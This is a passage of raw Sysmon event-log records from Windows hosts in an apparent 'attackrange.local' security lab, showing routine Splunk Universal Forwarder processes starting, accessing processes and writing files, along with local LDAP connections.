Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000108704Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:58.357{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local51985-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local389ldap 354300x8000000000000000108703Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:58.357{58E9C193-ACB4-615A-2700-00000000FC01}2920C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local51985-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local389ldap 10341000x8000000000000000108702Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:59.256{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B5E7-615A-9702-00000000FC01}8180C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108701Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:59.256{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108700Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:59.256{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108699Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:59.256{58E9C193-ACA4-615A-0500-00000000FC01}412964C:\Windows\system32\csrss.exe{58E9C193-B5E7-615A-9702-00000000FC01}8180C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000108698Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:59.256{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108697Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:59.256{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108696Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:59.256{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B5E7-615A-9702-00000000FC01}8180C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000108695Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:59.257{58E9C193-B5E7-615A-9702-00000000FC01}8180C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000108694Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:59.156{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACF418ACA64F1C9589070A6E20D74862,SHA256=705C0E48FD1006DEBEFD7D759E6DAA84AC6F1CE8ABD36B5B9B93F86280246C65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108693Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:59.125{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5C49D4E313A89B27C9B618B7F73A1ADD,SHA256=3CA9F4EF7410BFC3C7930EE723C90A7BACE3C6375FB8819933A2872FE8DC8271,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108692Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:59.125{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A237BD6CB7B1031E76F6511B634277C5,SHA256=465661D3D82C0D4328FDD92B96CCA2001D554F39B8AE40E252460CD1303FD8D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084194Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:06:00.744{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDF1C1A64AD4AFE0A2A45518C250DA52,SHA256=C46E4E3759A7C10C38CF93C8B7F6A3F1904450A57FB63EC826EBEAFA2FE5C48A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108715Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:00.256{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5C49D4E313A89B27C9B618B7F73A1ADD,SHA256=3CA9F4EF7410BFC3C7930EE723C90A7BACE3C6375FB8819933A2872FE8DC8271,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000108714Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:00.256{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B5E8-615A-9802-00000000FC01}8748C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108713Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:00.256{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108712Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:00.256{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108711Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:00.256{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108710Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:00.256{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108709Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:00.256{58E9C193-ACA4-615A-0500-00000000FC01}412428C:\Windows\system32\csrss.exe{58E9C193-B5E8-615A-9802-00000000FC01}8748C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000108708Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:00.256{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B5E8-615A-9802-00000000FC01}8748C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000108707Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:00.257{58E9C193-B5E8-615A-9802-00000000FC01}8748C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000108706Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:00.156{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90F0DB658BAA06DABE7AB330FBCC32E1,SHA256=7A72877E7DE34C88BFA70C0147EDDF010A2387C5B3735A6349D132C127ABEDCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084193Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:06:00.072{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F7533C2D77C7AB5C5C9DE2D3D730AB99,SHA256=17889D94C27D8B2FF11846AA1C8E98A35CAC181701041DB4F110E194C1907978,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084192Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:06:00.072{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DD2B96CBF2C35C3EEFEDCF41E93DA6D3,SHA256=E6ED00553F37A5DA4EBA9DAF8A14121FCD53434084FD084885AA233FAA8D7750,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084195Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:06:01.744{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EEC291FA7A0FE815ACE6272E6875340B,SHA256=2FE7497E4BFFF8BE98C90A4C08855EEB40559EC961B5B8866CA4ABF910BC8B07,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000108725Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:01.910{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B5E9-615A-9902-00000000FC01}8260C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108724Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:01.910{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108723Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:01.910{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108722Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:01.910{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108721Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:01.910{58E9C193-ACA4-615A-0500-00000000FC01}4126816C:\Windows\system32\csrss.exe{58E9C193-B5E9-615A-9902-00000000FC01}8260C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000108720Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:01.910{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108719Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:01.910{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B5E9-615A-9902-00000000FC01}8260C:\Program 